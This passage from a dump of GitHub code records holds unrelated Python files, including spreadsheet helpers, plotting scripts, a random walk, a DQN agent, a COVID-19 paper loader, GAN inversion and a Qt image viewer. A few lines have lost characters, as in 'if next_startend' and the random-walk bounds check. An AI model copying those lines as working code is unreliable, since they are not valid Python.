'.join(self.header))\n except ValueError as ve:\n raise Exception(\"Invalid header for namedtuple type\",ve)\n for row in self.iter_rows(min_row=1,values_only=True):\n\n yield self._nt(*row)\n\n def object(self,key_index:int=0,value_index:int=1):\n obj = type(self._camel_case(self.name), (Printable,), {})()\n for row in self.iter_rows(min_row=0,values_only=True):\n setattr(obj,self._snake_case(row[key_index]), row[value_index])\n return obj\n\n def dict(self,key_index:int=0,value_index:int=1,snake_case_keys:bool=False)->dict:\n if snake_case_keys:\n return {self._snake_case(row[key_index]): row[value_index] for \\\n row in self.iter_rows(min_row=0,values_only=True)}\n else:\n return {row[key_index]: row[value_index] for \\\n row in self.iter_rows(min_row=0,values_only=True)}\n def list(self,element:type=dict,snake_case_keys:bool=False,values_only:bool=True,\n element_keys:list[int]|list[str]=None)->list[tuple]|list[dict]:\n ret = []\n key_filter = lambda x,e:x is not None\n if element_keys:\n if isinstance(element_keys[0],str):\n key_filter = lambda x,e:x in e\n if element==dict:\n if snake_case_keys:\n header = self.header\n else:\n header = self.top_row\n _hi = []\n _hd = []\n for c,h in enumerate(header):\n if key_filter(h,element_keys):\n _hi.append(c)\n for row in self.iter_rows(min_row=1,values_only=values_only):\n nr = {}\n for i in _hi:\n nr[header[i]] = row[i]\n if any(nr.values()):\n ret.append(nr)\n else:\n break\n elif element in (tuple,list):\n for row in self.iter_rows(min_row=0,values_only=values_only):\n ret.append(element(row))\n return ret\n\ndef _set_sheet_inrs(sheet:Worksheet)->None:\n last_merge_row = max(sheet._merged_cells.keys(),default=0)\n for row,col_sets in list(sheet._merged_cells.items()):\n for start,end in col_sets:\n title = sheet.cell(row=row+1,column=start+1).value\n height = 0\n for sub_row in sheet.iter_rows(min_row=row+1,min_col=start+1,max_col=end+1,values_only=True):\n if any(sub_row):\n height+=1\n else:\n break\n sr = ImplicitNamedRange(title,max_row=row+height,min_row=row+2,min_col=start+1,max_col=end+1,sheet=sheet)\n if row < last_merge_row:\n for next_start,next_end in sheet._merged_cells[row+1]:\n if next_startend:\n break\n else:\n sr._nested.append((sheet.cell(row=row+2,column=next_start+1).value,row+1))\n suffix=1\n while (title,row) in sheet._nr:\n title = title + f'-{suffix}'\n suffix+=1\n if suffix>100:\n raise ValueError((title,row))\n sheet._nr[(title,row)] = sr\n\ndef implicit_named_ranges(sheet:Worksheet)->dict[tuple[str,int],ImplicitNamedRange]:\n if not sheet._nr:\n _set_sheet_inrs(sheet)\n return sheet._nr\n\n\n \ndef clear_values(self):\n for row in self:\n for cell in row:\n cell.value = None\n\ndef write_row(self,row:list,offset:tuple[int,int]=(1,1))->None:\n for column_count,value in enumerate(row):\n self.cell(row=offset[0],column=offset[1]+column_count).value = value\n\ndef write_rows(self,rows:list[list]|list[dict],offset:tuple[int,int]=(1,1))->None: \n if rows and isinstance(rows[0],dict):\n row_values = [list(rows[0].keys())]\n for row in rows:\n row_values.append(list(row.values()))\n for row_count,val in enumerate(row_values):\n self.write_row(val,(row_count+offset[0],offset[1]))\n\ndef open(pth:Path|str)->list[Course]:\n def _blanks(v:str|float|int):\n if v == \"\":\n return None\n return v\n pth = Path(pth)\n if pth.exists():\n wb = openpyxl.open(pth)\n for sc,sheet in enumerate(wb):\n sheet._merged_cells = {}\n sheet._nr = {}\n sheet.write_row = MethodType(write_row,sheet)\n sheet.write_rows = MethodType(write_rows,sheet)\n sheet.clear_values = MethodType(clear_values,sheet)\n if not sc:\n type(sheet).implicit_named_ranges = implicit_named_ranges\n \n for rc,row in enumerate(sheet.iter_rows()):\n row_keys = []\n key = []\n if any(isinstance(cell, openpyxl.cell.cell.MergedCell) for cell in row):\n for cc,cell in enumerate(row):\n if not isinstance(cell,openpyxl.cell.cell.MergedCell):\n if len(key)>1:\n row_keys.append(tuple([key[0],key[-1]]))\n key = [cc] \n else:\n key.append(cc)\n if len(key)>1:\n row_keys.append(tuple([key[0],key[-1]]))\n sheet._merged_cells[rc] = list(row_keys)\n else: \n break\n \n\n return wb\n \n \n \n \n\n\n#wb = open(r'test\\ATS.xlsx')\n#for sheet in wb:\n #print(sheet.title)\n #print(list(sheet.implicit_named_ranges()))\n ","repo_name":"dvanbolt/TrainerCourses","sub_path":"TrainerCourses/openpyxl_extension.py","file_name":"openpyxl_extension.py","file_ext":"py","file_size_in_byte":8605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"10270800972","text":"import matplotlib.pyplot as plt\nfrom matplotlib.patches import Rectangle\nfrom tqdm import tqdm\nimport matplotlib\nimport matplotlib.lines as mlines\n\n# open-type fonts\nmatplotlib.rcParams['pdf.fonttype'] = 42\n\n#\ns_res = [0, 0, 1, 2, 2, 2, 2, 2, 2, 2]\nm_res = [0, 0, 1, 5, 13, 13, 13, 13, 13, 13]\nl_res = [0, 0, 1, 5, 13,-47,-62,-62,-62,-62]\n\ndef draw(data,name):\n\n for i,d in enumerate(data):\n fig = plt.figure(figsize=(2,10))\n ax = plt.subplot(111)\n ax.set_ylim((-70,70))\n\n bars = ax.bar([0], [d], width=1, color='r' if d < 0 else 'g')\n ax.set_yscale('symlog')\n\n for rect in bars:\n height = rect.get_height()\n plt.text(rect.get_x() + rect.get_width()/2.0, height, ('' if height < 0 else '+')+'%d' % int(height), ha='center', va='bottom', size=36, color='w'if height<0 else 'g')\n\n plt.gca().get_xaxis().set_ticks([])\n plt.gca().get_yaxis().set_ticks([])\n plt.minorticks_off()\n # plt.majorticks_off()\n plt.ylabel('Net Resource Collected',fontsize=36)\n\n plt.gca().spines['top'].set_visible(False)\n plt.gca().spines['right'].set_visible(False)\n plt.gca().spines['bottom'].set_visible(False)\n plt.gca().spines['left'].set_visible(False)\n ax.axhline(y=0, color='k')\n\n plt.tight_layout(pad=0.4)\n\n plt.savefig('img/explanatory_sep/'+name+'-'+str(i+1)+'.pdf',transparent=True)\n\ndraw(s_res,'rs')\ndraw(m_res,'rm')\ndraw(l_res,'rl')\n","repo_name":"mmore500/alife-2018-presentation","sub_path":"script/explanatory_resource.py","file_name":"explanatory_resource.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"43440426941","text":"'''\n* 홀수인 자연수가 주어지면 달팽이 모양으로 숫자 출력\n\n* 방향 설정 후, 방향대로 이동했�� 때 장애물이 있으면 방향 수정하는 느낌으로 풀기\n'''\n\nimport sys\ninput = sys.stdin.readline\n\nN = int(input())\np = int(input())\n\n\narrays = [[0]*N for _ in range(N)]\n\n# 방향은 고정(하 우 상 좌)\ndx = [1,0,-1,0]\ndy = [0,1,0,-1]\n\nn = N**2\nx,y = 0,0\narrays[0][0] = n\n\n# 숫자 p의 인덱스\nX,Y = 0,0\n\ni = 0\nwhile n > 1:\n \n nx = x + dx[i]\n ny = y + dy[i] \n\n if nx <= N-1 and ny <= N-1 and nx >= 0 and ny >= 0 and arrays[nx][ny] == 0:\n arrays[nx][ny] = n-1\n if n-1 == p:\n X = nx\n Y = ny\n x = nx\n y = ny\n n -= 1\n\n else:\n i = (i+1) % 4\n\nfor array in arrays:\n print(*array)\n\n'''\n* 이렇게 하면 시간 더 걸림\nfor i in range(N):\n for j in range(N):\n print(array[i][j], end = \" \")\n print()\n'''\n\n \nprint(X+1,Y+1) \n\n \n \n \n \n \n\n","repo_name":"percyfrank/CodingTest_OldVersion","sub_path":"BAEKJOON/구현/s3_달팽이.py","file_name":"s3_달팽이.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"69862930132","text":"# -*- coding: utf-8 \n# simple random walk program\n\nimport numpy as np\nimport random\nfrom walker import Walker\n\n\nclass Walk:\n\t\"\"\"\n\tRandom walk class at the moment in 1D and 2D only\n\t\"\"\"\n\tdef __init__(self,steplength,dx,d=1):\n\t\tself.dx = dx\n\n\t\tself.d = d \t#dimension of the walk\n\t\tself.steplength = steplength\n\t\tself.walkers = []\n\t\tself.nwalkers = 0\n\t\tself.left = self.right = 0\n\n\n\t\tself._x1 = 1 + self.dx/2.0\n\t\tself._x0 = 0 - self.dx/2.0\n\n\tdef AddWalker(self,pos):\n\t\t# print \"Adding walker\"\n\t\ttmp = Walker(pos)\n\t\tself.walkers.append(tmp)\n\n\n\tdef Solve(self):\n\n\t\tself.left = self.right = 0\n\t\tl_limit = 3*self.dx\n\t\tr_limit = 4*self.dx\n\t\tindices = []\n\t\twalkers_leaving_area = []\n\t\tcounter = 0\n\n\t\tfor walker in self.walkers:\n\t\t\tdirection = (-1)**random.randint(0,1)\n\t\t\tif walker.r > l_limit and walker.r _x1:\n\t\t\twalker.r += 2*(_x1-walker.r)\n\n\n\n","repo_name":"fepettersen/fuzzy-dangerzone","sub_path":"src/walk.py","file_name":"walk.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33429602772","text":"from aiohttp import web\n\n\nclass Application(web.Application):\n def __init__(self):\n super().__init__()\n self.router.add_post(\n '/internal/eats-order-send/v1/order/event', self.post_order_event,\n )\n\n async def post_order_event(self, _):\n return web.json_response({})\n","repo_name":"Alexander-Berg/2022-tests-examples-2","sub_path":"Taxi/docker-integration-tests/mock-server/mock_server/modules/eats_order_send.py","file_name":"eats_order_send.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"4311802679","text":"from tkinter import Tk, Label, Entry, Button\nfrom tkinter import messagebox\n\ndef suma():\n a_value = float(a.get())\n b_value = float(b.get())\n if b_value == 0:\n # messagebox.showerror(\"Dzielenie przez 0!!!\", \"Zmień b\")\n wynik.configure(text=f\"Błąd!\")\n return\n wynik.configure(text=f\"{a_value / b_value}\")\n\n\nroot = Tk()\nroot.columnconfigure(1, weight=1)\nlabel_a = Label(master=root, text=\"Liczba a: \")\nlabel_a.grid(row=0, column=0)\na = Entry(master=root)\na.grid(row=0, column=1)\n\nlabel_b = Label(master=root, text=\"Liczba b: \")\nlabel_b.grid(row=1, column=0)\nb = Entry(master=root)\nb.grid(row=1, column=1)\n\nsum_button = Button(master=root, text=\"Dziel\", command=suma)\nsum_button.grid(row=2, column=0)\n\nwynik = Label(master=root, text=\"-\")\nwynik.grid(row=2, column=1)\n\nroot.mainloop()\n","repo_name":"rkorzen/python_bootcamp_08102022","sub_path":"dzien_08/tkinte_grid_example.py","file_name":"tkinte_grid_example.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"1846694682","text":"from poutyne import Model\nfrom copy import deepcopy # NEW\n\nimport numpy as np\nimport gym\nimport torch\nimport random\nimport matplotlib.pyplot as plt \nimport pickle\n\n\nclass ReplayBuffer:\n def __init__(self, buffer_size):\n self.__buffer_size = buffer_size\n self.data = []\n \n\n def store(self, element):\n '''\n Stores an element. If the replay buffer is already full, deletes the oldest\n element to make space.\n '''\n \n # TODO: implement\n self.data.append(element)\n\n if (len(self.data) > self.__buffer_size) : \n del self.data[0]\n\n \n\n def get_batch(self, batch_size):\n '''\n Returns a list of batch_size elements from the buffer.\n '''\n \n # TODO: implement\n return random.choices(self.data, k=batch_size)\n\n\ndef evaluate_policy(env, model, render):\n scores = 0\n turns = 1\n for j in range(turns):\n states, done, ep_rewards, steps = env.reset(), False, 0, 0\n steps = 0\n ep_r = 0\n while not done and steps < 600:\n actions = []\n for s in states:\n q_vals =model.predict_on_batch(s.astype(np.float32)) \n actions.append(model.select_action(q_vals, epsilon=0, evaluate=True))\n next_states, rewards, done, info = env.step(actions)\n ep_r += np.sum(rewards)\n steps += 1\n states = next_states\n if render:\n env.render()\n scores += ep_r\n return scores/turns\n\nclass DQN(Model):\n def __init__(self, actions, *args, **kwargs):\n self.actions = actions\n super().__init__(*args, **kwargs)\n\n def select_action(self, state, epsilon=0, evaluate=False):\n '''\n Returns the selected action according to an epsilon-greedy policy.\n '''\n\n if np.random.rand() < epsilon and not evaluate:\n action = self.actions.sample()\n else:\n action = np.argmax(state)\n \n return action\n\n def soft_update(self, other, tau):\n '''\n Code for the soft update between a target network (self) and\n a source network (other).\n\n The weights are updated according to the rule in the assignment.\n '''\n new_weights = {}\n\n own_weights = self.get_weight_copies()\n other_weights = other.get_weight_copies()\n\n for k in own_weights:\n new_weights[k] = (1 - tau) * own_weights[k] + tau * other_weights[k]\n\n self.set_weights(new_weights)\n\n\nclass NNModel(torch.nn.Module):\n '''\n Neural Network with 3 hidden layers of hidden dimension 64.\n '''\n\n def __init__(self, in_dim, out_dim, n_hidden_layers=3, hidden_dim=64):\n super().__init__()\n layers = [torch.nn.Linear(in_dim, hidden_dim), torch.nn.ReLU()]\n for _ in range(n_hidden_layers - 1):\n layers.extend([torch.nn.Linear(hidden_dim, hidden_dim), torch.nn.ReLU()])\n layers.append(torch.nn.Linear(hidden_dim, out_dim))\n\n self.fa = torch.nn.Sequential(*layers)\n\n def forward(self, x):\n return self.fa(x)\n\n\ndef format_batch(batch, target_network, gamma):\n '''\n Input : \n - batch, a list of n=batch_size elements from the replay buffer\n - target_network, the target network to compute the one-step lookahead target\n - gamma, the discount factor\n\n Returns :\n - states, a numpy array of size (batch_size, state_dim) containing the states in the batch\n - (actions, targets) : where actions and targets both\n have the shape (batch_size, ). Actions are the \n selected actions according to the target network\n and targets are the one-step lookahead targets.\n '''\n \n states = np.array([x[0] for x in batch]) \n actions = np.array([x[1] for x in batch])\n rewards = np.array([x[2] for x in batch]) \n next_states = np.array([x[3] for x in batch]) \n dones = np.array([x[4] for x in batch])\n\n next_q_vals = target_network.predict_on_batch(next_states)\n\n max_qvals = np.max(next_q_vals, axis=-1)\n targets = rewards + gamma * max_qvals * (1 -dones)\n targets = targets.astype(np.float32)\n return states, (actions, targets)\n\n\ndef dqn_loss(y_pred, y_target):\n '''\n Input :\n - y_pred, (batch_size, n_actions) Tensor outputted by the network\n - y_target = (actions, targets), where actions and targets both\n have the shape (batch_size, ). Actions are the \n selected actions according to the target network\n and targets are the one-step lookahead targets.\n\n Returns :\n - The DQN loss \n '''\n \n\n actions, Q_target = y_target\n \n try:\n Q_predict = y_pred.gather(1, actions.unsqueeze(-1).to(torch.int64)).squeeze()\n except:\n print(actions, y_pred.shape)\n return torch.nn.functional.mse_loss(Q_predict, Q_target)\n\n\ndef set_random_seed(environment, seed):\n environment.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed) # NEW\n\n\ndef run(batch_size, gamma, buffer_size, seed, tau, training_interval, learning_rate):\n environment = gym.make('gym_ants:ants-v0')\n eval_env = gym.make('gym_ants:ants-v0')\n eval_env.seed(seed)\n set_random_seed(environment, seed)\n\n\n model = NNModel(6, 4)\n nb_trajectories = 500\n\n\n source_agent = DQN(environment.action_space, network=model, optimizer=torch.optim.Adam(model.parameters(), lr=learning_rate), loss_function=dqn_loss)\n target_agent = DQN(environment.action_space, network=model, optimizer=torch.optim.Adam(model.parameters(), lr=learning_rate), loss_function=dqn_loss)\n\n replay_buffer = ReplayBuffer(buffer_size)\n epsilon = 1.0\n R_trajectories = np.zeros(nb_trajectories)\n loss = []\n avg_training_loss = np.zeros(nb_trajectories)\n scores_history = []\n for n_trajectories in range(nb_trajectories):\n trajectory_done = False\n\n G = 0\n\n states = environment.reset()\n step_count = 1\n mean_loss = []\n while not trajectory_done and step_count <600:\n #environment.render()\n actions = []\n for s in states:\n q_vals =target_agent.predict_on_batch(s.astype(np.float32)) \n actions.append(target_agent.select_action(q_vals, epsilon))\n next_states, rewards, trajectory_done, _ = environment.step(actions)\n G += np.sum(rewards)\n for (s, a, r, next_s) in zip(states, actions, rewards, next_states):\n replay_buffer.store((s.astype(np.float32) , a, r, next_s.astype(np.float32) , trajectory_done))\n\n if len(replay_buffer.data) > batch_size :\n if (step_count % training_interval == 0) :\n minibatch = replay_buffer.get_batch(batch_size)\n \n states_, (actions_taken, targets) = format_batch(minibatch, target_agent, gamma)\n loss_ = source_agent.train_on_batch(states_, (actions_taken, targets))\n loss.append(loss_)\n mean_loss.append(loss_)\n target_agent.soft_update( source_agent, tau)\n\n states = next_states\n step_count += 1\n \n if n_trajectories % 10 == 0:\n\n loss_mean = loss[-1]\n score = evaluate_policy(eval_env, target_agent, render=False)\n scores_history.append(score)\n print('Epoch {}:'.format(n_trajectories),'score:', score)\n #print(f\"After {n_trajectories} trajectories, we have G_0 = {G:.2f}, loss {loss_mean}, epsilon {epsilon:4f}\")\n \n\n epsilon = max(0.99*epsilon, 0.01)\n R_trajectories[n_trajectories] = G\n avg_training_loss[n_trajectories] = np.mean(np.array(mean_loss))\n environment.close()\n eval_env.close()\n return scores_history\n \n\nif __name__ == \"__main__\":\n '''\n All hyperparameter values and overall code structure are only given as a baseline. \n \n You can use them if they help you, but feel free to implement from scratch the\n required algorithms if you wish!\n '''\n batch_size =64\n gamma = 0.9\n buffer_size = 4e5\n seed = 42\n tau = 0.1\n training_interval = 10\n learning_rate = 1*1e-4\n\n seed = 42\n\n nb_runs = 20\n np.random.seed(seed)\n histories = []\n for _ in range(nb_runs):\n s = np.random.randint(1000)\n histories.append(run(batch_size, gamma, buffer_size, seed, tau, training_interval, learning_rate))\n\n avg_experiments_cumulative_rewards = np.mean(histories, axis=0)\n std_experiments_cumulative_rewards = np.std(histories , axis=0)\n\n epochs = np.array(range(len(avg_experiments_cumulative_rewards)))*10\n plt.plot(epochs, avg_experiments_cumulative_rewards, label = \"SAC\") \n plt.fill_between(epochs, avg_experiments_cumulative_rewards, \n avg_experiments_cumulative_rewards+std_experiments_cumulative_rewards, alpha=0.4)\n \n with open('history/scores_history_SAC{}'.format(seed), 'wb') as fp:\n pickle.dump(histories, fp)\n\n\n plt.xlabel(\"Épisodes\")\n plt.ylabel(\"Récompenses\")\n\n plt.legend()\n plt.show()\n\n","repo_name":"TheophileBERTELOOT/PetriDish","sub_path":"main_DQN.py","file_name":"main_DQN.py","file_ext":"py","file_size_in_byte":9268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"74678667731","text":"import pandas as pd\nfrom DataLoader import Data\nimport glob\nimport json\n#############################################################################\n# Copy from https://www.kaggle.com/maksimeren/covid-19-literature-clustering#\n#############################################################################\nclass FileReader:\n def __init__(self, file_path):\n with open(file_path) as file:\n content = json.load(file)\n self.paper_id = content['paper_id']\n self.abstract = []\n self.body_text = []\n # Abstract\n for entry in content['abstract']:\n self.abstract.append(entry['text'])\n # Body text\n for entry in content['body_text']:\n self.body_text.append(entry['text'])\n self.abstract = '\\n'.join(self.abstract)\n self.body_text = '\\n'.join(self.body_text)\n def __repr__(self):\n return f'{self.paper_id}: {self.abstract[:200]}... {self.body_text[:200]}...'\n \n\n\nclass Covid19AI2MetaData(Data):\n def __init__(self):\n super(Covid19AI2MetaData, self).__init__()\n \n def __len__(self):\n return len(self.meta_df)\n \n def __getitem__(self, item):\n return self.meta_df.iloc[item, :].values.tolist()\n \n def collumn_info(self):\n return list(self.data.columns)\n \n def download(self, path_or_url, **kwargs):\n meta_data_path = f'{path_or_url}/metadata.csv'\n self.meta_df = pd.read_csv(meta_data_path, dtype={'pubmed_id': str,\n 'Microsoft Academic Paper ID': str,\n 'doi': str})\n self.data = self.meta_df\n \n \n\n\nclass Covid19AI2Paper(Data):\n def __init__(self):\n super(Covid19AI2Paper, self).__init__()\n \n def __len__(self):\n return len(self.data)\n \n def __getitem__(self, item):\n return self.data.iloc[item, :].values.tolist()\n \n def download(self, path_or_url, **kwargs):\n meta_df = kwargs['meta_df']\n all_json = glob.glob(f'{path_or_url}/**/*.json', recursive=True)\n\n dict_ = {'paper_id': [], 'doi': [], 'abstract': [], 'body_text': [], 'authors': [], 'title': [], 'journal': [],\n 'abstract_summary': []}\n\n for idx, entry in enumerate(all_json):\n if idx % (len(all_json) // 10) == 0:\n print(f'Processing index: {idx} of {len(all_json)}')\n try:\n content = FileReader(entry)\n except Exception as e:\n continue\n\n meta_data = meta_df.loc[meta_df['sha'] == content.paper_id]\n # no metadata, skip this paper\n if len(meta_data) == 0:\n continue\n dict_['abstract'].append(content.abstract)\n dict_['paper_id'].append(content.paper_id)\n dict_['body_text'].append(content.body_text)\n dict_['title'].append(meta_data['title'].values[0])\n dict_['journal'].append(meta_data['journal'].values[0])\n dict_['authors'].append(meta_data['authors'].values[0])\n dict_['doi'].append(meta_data['doi'].values[0])\n \n if len(content.abstract) == 0:\n # no abstract provided\n dict_['abstract_summary'].append(\"Not provided.\")\n self.data = pd.DataFrame(dict_,\n columns=['paper_id', 'doi', 'abstract', 'body_text', 'authors', 'title', 'journal',\n 'abstract_summary'])\n\n def column_info(self, **kwargs):\n return self.data.columns\n \n \n","repo_name":"bigheiniu/COVID-19-Dataloaders","sub_path":"Academic/Covid19AI2.py","file_name":"Covid19AI2.py","file_ext":"py","file_size_in_byte":3591,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"30545702197","text":"#! /usr/bin/env python3\n\nfrom utils import load_data\n\n\ndef main():\n # Read input data\n depths = load_data()\n\n # Count the number of times the depth increases, per rolling window\n windowed_step_downs = (depths.rolling(window=3).sum().diff() > 0)[0].sum()\n\n # Print solution\n print(f\"The windowed depth measurement increases {windowed_step_downs} times.\")\n\n return windowed_step_downs\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"jwalton3141/AdventOfCode21","sub_path":"day01/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"18796395512","text":"import torch \nimport torch.nn as nn\nimport torchvision.utils as vutils\nimport torchvision.transforms as transforms\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom ellipses import EllipsesDataset\nfrom network.Generator import Generator\nfrom tqdm import tqdm\nfrom skimage.transform import radon, iradon\n\n\nimg_list = []\ndevice = torch.device(\"cuda\" if (torch.cuda.is_available()) else \"cpu\")\npath = \"trained_models/gen.pth\"\nnetG = Generator(128, 64, 1).to(device)\nnetG.load_state_dict(torch.load(path))\n\nnoise = torch.randn(1, 128, 1, 1, device = device)\nfake = netG(noise)\nprint(fake.shape)\n\nimage_template = np.ones((64, 64))\n\nellipse_dataset = EllipsesDataset(image_template = image_template, n_samples = 1, mode=\"train\", seed = 7) #56 1,2,5,7\n\n\nz = torch.nn.parameter.Parameter(torch.randn(70, 128, 1, 1, device = device))\noptimizer = torch.optim.Adam([z], lr=0.1)\n\nellipse = torch.from_numpy(ellipse_dataset[0][0]).unsqueeze(0).to(device)\n\n# return the biggest value in ellipse tensor\nmax_value = torch.max(ellipse)\n\n# Normalise the ellipse tensor\nellipse = ellipse/max_value\n\ngt_ellipse = ellipse\n\ngaussian_blur = transforms.GaussianBlur(kernel_size=5, sigma=(0.1, 2.0))\nellipse = gaussian_blur(ellipse)\n\nellipse_numpy = ellipse.cpu().detach().squeeze(0).numpy()\n\nviews_theta = np.linspace(0., 180., 30, endpoint=False)\nmeasured = radon(ellipse_numpy, theta=views_theta, circle=True)\nfbp = iradon(measured, theta=views_theta, circle=True)\nmax_value_fbp = np.max(fbp)\nfbp = fbp/max_value_fbp\n\nfor i in tqdm(range(1000)):\n \n optimizer.zero_grad()\n reconstruction = netG(z)\n loss = torch.nn.functional.mse_loss(reconstruction[0], ellipse)\n loss.backward()\n optimizer.step()\n\n\nmax_reconstruction = torch.max(reconstruction[0][0])\nreconstruction[0][0] = reconstruction[0][0]/max_reconstruction\n\n\n\nfig = plt.figure(figsize=(10, 10))\nfig.add_subplot(1, 3, 1)\nplt.imshow(reconstruction[0][0].cpu().detach().numpy(), cmap='gray')\nplt.colorbar(label=\"colour bar\", orientation=\"horizontal\")\nplt.title(\"GAN inversion\")\n\nfig.add_subplot(1, 3, 3)\nplt.imshow(gt_ellipse[0].cpu().detach().numpy(), cmap='gray')\nplt.colorbar(label=\"colour bar\", orientation=\"horizontal\")\nplt.title(\"Ground truth\")\n\nfig.add_subplot(1, 3, 2)\nplt.imshow(fbp, cmap='gray')\nplt.colorbar(label=\"colour bar\", orientation=\"horizontal\")\nplt.title(\"FBP\")\n\nplt.show()\n\n\n\n\n \n\n\n\n","repo_name":"OscarL63/Generative-Networks-for-Sparsity-Regularisation","sub_path":"Generative_Regularisation/invert_generator.py","file_name":"invert_generator.py","file_ext":"py","file_size_in_byte":2366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"30218140894","text":"#!/usr/bin/env python\n# coding=utf-8\n'''\n@描述: 显示图片\n@版本: V1_0\n@作者: LiWanglin\n@创建时间: 2020.02.16\n@最后编辑人: LiWanglin\n@最后编辑时间: 2020.02.18\n'''\n\n\nimport cv2\n\nfrom PySide2.QtWidgets import QGraphicsPixmapItem, QGraphicsScene, QGraphicsView\nfrom PySide2.QtGui import QImage, QPixmap\nfrom PySide2.QtCore import QPoint, Qt, Signal\n\n\nclass ModifyQGraphicsView(QGraphicsView):\n \"\"\"改进 QGraphicsView 类\n\n 由于 QGraphicsView 类没有与 mouseMoveEvent() 相关的信号,因而无法定义槽函数于此事件关联。为此,\n 从 QGraphicsView 类集成定义一个类 QGraphicsView 类,实现鼠标移动事件函数 mouseMoveEvent() 的处理,\n 并把事件转换为自定义信号,这样就可以在程序里面设计槽函数响应这些鼠标事件。\n\n @属性说明:\n mouse_move:定义一个鼠标移动信号\n\n @方法说明:\n mouseMoveEvent():鼠标移动事件\n\n \"\"\"\n def __init__(self, parent=None, image_data = None):\n super().__init__(parent)\n\n self._image_data = image_data\n\n if self._image_data is not None:\n # 获取图片信息\n self._image_shape = len(self._image_data.shape)\n self._image_h, self._image_w = self._image_data.shape[:2]\n\n mouse_move = Signal(QPoint) # 定义一个鼠标移动信号\n mouse_clicked = Signal(QPoint) # 定义一个鼠标点击信号\n\n def mouseMoveEvent(self, event): \n '''鼠标移动事件\n\n 鼠标移动事件\n\n @参数说明: \n point:当前鼠标所在的坐标点\n\n @返回值: \n 无\n\n @注意: \n 无\n ''' \n point = event.pos() \n self.mouse_move.emit(point) #发射信号\n super().mouseMoveEvent(event)\n\n def mousePressEvent(self, event):\n '''鼠标点击事件\n\n 鼠标点击事件\n\n @参数说明: \n point:当前鼠标所在的坐标点\n\n @返回值: \n 无\n\n @注意: \n 无\n ''' \n if(event.button() == Qt.LeftButton):\n point = event.pos()\n self.mouse_clicked.emit(point) #发射信号 \n super().mousePressEvent(event)\n\n def scanf_image_data(self, image_data):\n ''' 获得图片数据,并获取图片属性\n\n @参数说明: \n image_data :图片数据\n\n @返回值: \n 无\n\n @注意: \n 无\n '''\n self._image_data = image_data\n\n # 获取图片信息\n self._image_shape = len(self._image_data.shape)\n self._image_h, self._image_w = self._image_data.shape[:2]\n\n def dispaly_image(self):\n '''在 ModifyQGraphicsView 显示一张图片\n\n 在 ModifyQGraphicsView 显示一张图片 \n\n @参数说明: \n 无\n\n @返回值: \n 无\n\n @注意: \n 无\n '''\n\n # 根据图片的维度,进行不同的处理\n if self._image_shape is 2:\n # 如果是二维灰度图片,读取方式为QImage.Format_Grayscale8\n temp_q_image = QImage(self._image_data, self._image_h ,\n self._image_w, QImage.Format_Grayscale8)\n elif self._image_shape is 3:\n # 由于QImage读取方式为RGB,但 opencv 读取图片形式为BGR,所以要进行色彩转换\n temp_q_image = cv2.cvtColor(self._image_data, cv2.COLOR_BGR2RGB)\n\n # 如果是三维灰度图片,读取方式为QImage.Format_RGB888\n temp_q_image = QImage(temp_q_image, self._image_h, self._image_w, \n QImage.Format_RGB888)\n else:\n return None\n \n # 2. 像素映射\n temp_q_image_pix = QPixmap.fromImage(temp_q_image) # 将给定图像转换为像素映射\n\n # 3. 在graphics_view中显示图片\n temp_item = QGraphicsPixmapItem(temp_q_image_pix)\n temp_q_sece = QGraphicsScene()\n temp_q_sece.addItem(temp_item) \n self.setScene(temp_q_sece)\n temp_q_sece.clearSelection()","repo_name":"WanglinLi595/OpenCV_Function_Demonstration","sub_path":"src/tools/modify_graphics.py","file_name":"modify_graphics.py","file_ext":"py","file_size_in_byte":4178,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"73623344850","text":"from __future__ import annotations\nimport functions.function_node as function_node\nimport functions.bool_evaluation_set as bool_evaluation_set\nfrom typing import TypeVar\n\nT = TypeVar('T')\n\nclass ConditionalFunction:\n \"\"\"ConditionalFunction represents a callable that has a conditional.\n\n ConditionalFunction represents a callable (callback) that has a \n conditional. The callback will not execute if the requirement\n callback returns False. No error is thrown if False is returned\n by the requirement function.\n\n\n Attributes:\n function (callable[..., T]): The primary function.\n requirement (callable[None, bool]): The requirement function\n that returns True if the primary function can run and False\n otherwise.\n \"\"\"\n def __init__(self, function: callable[..., T], requirement: callable[None, bool]):\n \"\"\"Initializes a ConditonalFunction with the given functions.\n\n Args:\n function (callable[..., T]): The primary function.\n requirement (callable[None, bool]): The requirement function\n that returns True if the primary function can run and False\n otherwise.\n \"\"\"\n self.function: callable[..., T] = function\n self.requirement: callable[None, bool] = requirement\n\n def __call__(self) -> T:\n \"\"\"Runs the primary function if the requirement is satisfied.\n\n Runs the primary function if the requirement is satisfied. if\n the requirement is not satisfied, the return value is None.\n This function does not discern the source of the None.\n\n Returns:\n The return value of the primary function.\n \"\"\"\n if self.requirement():\n return self.function()\n\n @staticmethod\n def generate(function: callable[..., T], data: dict[str, any], inferred: dict[str, str], literal: dict[str, any], requirements: list[list[dict[str, any]]]) -> ConditionalFunction:\n \"\"\"Creates a 